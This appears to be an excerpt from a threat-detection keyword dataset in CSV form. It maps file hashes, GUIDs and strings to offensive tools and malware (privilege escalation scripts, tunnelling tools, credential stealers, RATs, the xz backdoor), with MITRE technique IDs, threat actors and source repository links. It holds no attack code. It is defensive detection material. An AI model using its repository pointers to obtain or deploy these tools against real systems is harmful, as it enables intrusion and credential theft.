"*d37c8c47e154d9b2021eb2c857a2ed617ddfc4aa6e644d2302bca09a18d06946*",".{0,1000}d37c8c47e154d9b2021eb2c857a2ed617ddfc4aa6e644d2302bca09a18d06946.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39594" "*d37d33ecf520439042e8ed6d68c35599b6a665564ff1c6fc863ffa0156d0e0dd*",".{0,1000}d37d33ecf520439042e8ed6d68c35599b6a665564ff1c6fc863ffa0156d0e0dd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39595" "*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*",".{0,1000}d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","39597" "*d3821591de381cb2861c5cf554009e51d7afe51b7c14e89b6f06a666bab949ff*",".{0,1000}d3821591de381cb2861c5cf554009e51d7afe51b7c14e89b6f06a666bab949ff.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","39598" 
"*d384ec908583b271588a27748850e4cadf9d8b55a4afdfa54170738da54fc4ef*",".{0,1000}d384ec908583b271588a27748850e4cadf9d8b55a4afdfa54170738da54fc4ef.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","39599" "*d386714d1924af89b940a7f6a9a436bf07938db1e83e686e9f20bd4275660e2d*",".{0,1000}d386714d1924af89b940a7f6a9a436bf07938db1e83e686e9f20bd4275660e2d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39600" "*d3876cdd08d5cc314448e50b35e6dd7779925bfeb93f6309b12e1e234f832dde*",".{0,1000}d3876cdd08d5cc314448e50b35e6dd7779925bfeb93f6309b12e1e234f832dde.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39601" "*d38d1bd6117fce3916ca8b1c8c2c0bf62f8cb9753bdc3ac6e18071cd85631a3e*",".{0,1000}d38d1bd6117fce3916ca8b1c8c2c0bf62f8cb9753bdc3ac6e18071cd85631a3e.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","39603" "*d38d527d1e62c67ee117a812e6de41f422d7707b40b291ca87e73ac44e2de6fe*",".{0,1000}d38d527d1e62c67ee117a812e6de41f422d7707b40b291ca87e73ac44e2de6fe.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39604" "*d3924d3bf6f59335a1e5453d80eaaa7404cea2e342105c3e69ddfb943aeb29c6*",".{0,1000}d3924d3bf6f59335a1e5453d80eaaa7404cea2e342105c3e69ddfb943aeb29c6.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","0","#filehash","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","39605" "*d399157530a7b9d0678ab86e8dd1a24e018f38f68f614d06fa22e4b634e933e3*",".{0,1000}d399157530a7b9d0678ab86e8dd1a24e018f38f68f614d06fa22e4b634e933e3.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","39606" "*d39a670a35257b1686b0f6d6b27fab1691839e925ba18c5c30c973ea70a31391*",".{0,1000}d39a670a35257b1686b0f6d6b27fab1691839e925ba18c5c30c973ea70a31391.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39607" "*d39b1767ec968904d778d5a0d78ee49bd96e4b66a333c7198f2712e31ff2f46c*",".{0,1000}d39b1767ec968904d778d5a0d78ee49bd96e4b66a333c7198f2712e31ff2f46c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39608" "*d39ee3711191ba35873ecaf10a0fec4d1bc80bc31a6718e2954f6f4400075d82*",".{0,1000}d39ee3711191ba35873ecaf10a0fec4d1bc80bc31a6718e2954f6f4400075d82.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","39609" 
"*d3a7210d3999176aaea1f64927668d443bffbd764fe113e2869b1ad03c2d3013*",".{0,1000}d3a7210d3999176aaea1f64927668d443bffbd764fe113e2869b1ad03c2d3013.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","39612" "*d3a8f179535cb7e3e16929e3e65811416d7775673d9abbeeca8d814f5bfa927a*",".{0,1000}d3a8f179535cb7e3e16929e3e65811416d7775673d9abbeeca8d814f5bfa927a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39613" "*d3c1e10f04b8628fe4f739c7f59ffe38433786d543c9a8cb2fb0b85e1bf0912c*",".{0,1000}d3c1e10f04b8628fe4f739c7f59ffe38433786d543c9a8cb2fb0b85e1bf0912c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39619" "*d3c3d97fdf1783eb56340521d315a0071b1f700ab3cec537723b866e3f56ebc3*",".{0,1000}d3c3d97fdf1783eb56340521d315a0071b1f700ab3cec537723b866e3f56ebc3.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39620" 
"*d3c6d1e4ca184e35b872d8e376f74229db95aa4d40b99def7706263e8612ba09*",".{0,1000}d3c6d1e4ca184e35b872d8e376f74229db95aa4d40b99def7706263e8612ba09.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","39621" "*d3cf1621c8b439251029d7652b385722e0a7accc8b9877e9fda80ff1aae6d2b5*",".{0,1000}d3cf1621c8b439251029d7652b385722e0a7accc8b9877e9fda80ff1aae6d2b5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39623" "*d3ckx1/Crack-allDBs*",".{0,1000}d3ckx1\/Crack\-allDBs.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","39624" "*D3CrYP7V41U3(*",".{0,1000}D3CrYP7V41U3\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","39625" 
"*d3d1a4bc05989627fc32615a0ec5b280f521577437a7bbce5dbd2e06a9a54602*",".{0,1000}d3d1a4bc05989627fc32615a0ec5b280f521577437a7bbce5dbd2e06a9a54602.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39626" "*D3DF3F32716042404798E3E9D691ACED2F78BD?D5*",".{0,1000}D3DF3F32716042404798E3E9D691ACED2F78BD\?D5.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","39628" "*d3e1ab57a570a8853f6ca82ceada334f8e909252cca989451d201ae14cd178a4*",".{0,1000}d3e1ab57a570a8853f6ca82ceada334f8e909252cca989451d201ae14cd178a4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39629" "*D3E7005E-6C5B-47F3-A0B3-028C81C0C1ED*",".{0,1000}D3E7005E\-6C5B\-47F3\-A0B3\-028C81C0C1ED.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","39631" "*d3e8378618c05eab2159113af6737a1c6b49f982ebe2eb1ab7e9b52e5ce1b330*",".{0,1000}d3e8378618c05eab2159113af6737a1c6b49f982ebe2eb1ab7e9b52e5ce1b330.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39632" "*d3eb242554adec76ed43cb76dae2c776bf086b2e2c15335c80fe79852286310e*",".{0,1000}d3eb242554adec76ed43cb76dae2c776bf086b2e2c15335c80fe79852286310e.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","39634" "*d3fb208381f7b76b1dfd3250b98fd258bdf1a1d77d721dd52b19558968910cb1*",".{0,1000}d3fb208381f7b76b1dfd3250b98fd258bdf1a1d77d721dd52b19558968910cb1.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and 
managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","39637" "*d3fc31e347e01560159e4a3955f4ceca4ee12b06a2f56c448ce5d10c9c8788cd*",".{0,1000}d3fc31e347e01560159e4a3955f4ceca4ee12b06a2f56c448ce5d10c9c8788cd.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","39638" "*d3fcbfcd8d9ca33ba19dffbcc8d5de2f8ef18baa028e41eded243a84d496e8d8*",".{0,1000}d3fcbfcd8d9ca33ba19dffbcc8d5de2f8ef18baa028e41eded243a84d496e8d8.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","39640" "*d3lb3@protonmail.com*",".{0,1000}d3lb3\@protonmail\.com.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#email","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","39641" "*D3m0n1z3dShell-main*",".{0,1000}D3m0n1z3dShell\-main.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - 
T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","39642" "*d403d6b2805db4649b37c3646cf9cce6eecbdb3350a5eb5e78079c0d8f55f7a8*",".{0,1000}d403d6b2805db4649b37c3646cf9cce6eecbdb3350a5eb5e78079c0d8f55f7a8.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39645" "*d42056fad9278acecf2a979acd6aa24bd1e757c8429a424b245dbc0a39bde9a2*",".{0,1000}d42056fad9278acecf2a979acd6aa24bd1e757c8429a424b245dbc0a39bde9a2.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39646" "*d42270ec9fee729c30fd5b96918170c896436b04b863a82d578beff5fd980a6c*",".{0,1000}d42270ec9fee729c30fd5b96918170c896436b04b863a82d578beff5fd980a6c.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#filehash","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","39647" "*d423b1efdaf4f11171e6daf6e096e3651210cc454ccd6bb65ac07fd0aa0d7806*",".{0,1000}d423b1efdaf4f11171e6daf6e096e3651210cc454ccd6bb65ac07fd0aa0d7806.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39648" "*d4254babd731bc584ca2e41f98f2f570b43ba92dcfbb0e0bee1cab109a5b096c*",".{0,1000}d4254babd731bc584ca2e41f98f2f570b43ba92dcfbb0e0bee1cab109a5b096c.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","39649" "*d42f35102915099261b206a59fd3e7262af7a6d7f749f2236ba8b6d2349eec92*",".{0,1000}d42f35102915099261b206a59fd3e7262af7a6d7f749f2236ba8b6d2349eec92.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39652" "*d43660674a9329c64d5a7821c5bd2cdffdb572d95119a6dfee6684bb221bbfb1*",".{0,1000}d43660674a9329c64d5a7821c5bd2cdffdb572d95119a6dfee6684bb221bbfb1.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","39653" "*d43a9a1559ceb6fa1906b0142c375b8d2fa52e3725df36ec795cb0e734e110ce*",".{0,1000}d43a9a1559ceb6fa1906b0142c375b8d2fa52e3725df36ec795cb0e734e110ce.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39654" "*d43c57b216147ed60b4f3ba8a9e9543761492057788d64fef896e5075249630a*",".{0,1000}d43c57b216147ed60b4f3ba8a9e9543761492057788d64fef896e5075249630a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39655" "*d43ceb0d2efb5fdee19d4f7b2448c7f69a6c5d24bfdfd21f5e0fce570fb47d79*",".{0,1000}d43ceb0d2efb5fdee19d4f7b2448c7f69a6c5d24bfdfd21f5e0fce570fb47d79.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","39656" "*d43fc4c6e67a332b6abbb4b35186e9a20fa962c6aa4521f49b19f5bf372262d2*",".{0,1000}d43fc4c6e67a332b6abbb4b35186e9a20fa962c6aa4521f49b19f5bf372262d2.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","#filehash","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","39657" "*d44971afba15d74da67705ba5d44c7810be3b40baa11c25def44db606e6c8dfd*",".{0,1000}d44971afba15d74da67705ba5d44c7810be3b40baa11c25def44db606e6c8dfd.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39658" "*d44bdc842118dc9ca7fb8d4d8c5a9e4bfb50f1e28daacdec3e4e6840dade446f*",".{0,1000}d44bdc842118dc9ca7fb8d4d8c5a9e4bfb50f1e28daacdec3e4e6840dade446f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39659" "*d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3*",".{0,1000}d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3","10","10","N/A","N/A","N/A","N/A","39660" 
"*d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3*",".{0,1000}d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","39661" "*d44e7580049c7a6681402f1824d64a4bece941456bc3f1ee22fe5325b9644fb2*",".{0,1000}d44e7580049c7a6681402f1824d64a4bece941456bc3f1ee22fe5325b9644fb2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39663" "*d44f92ca48ad740a9ec34a5022ad904fbba74eba78b9b8a2a353c0ef4587e682*",".{0,1000}d44f92ca48ad740a9ec34a5022ad904fbba74eba78b9b8a2a353c0ef4587e682.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39664" 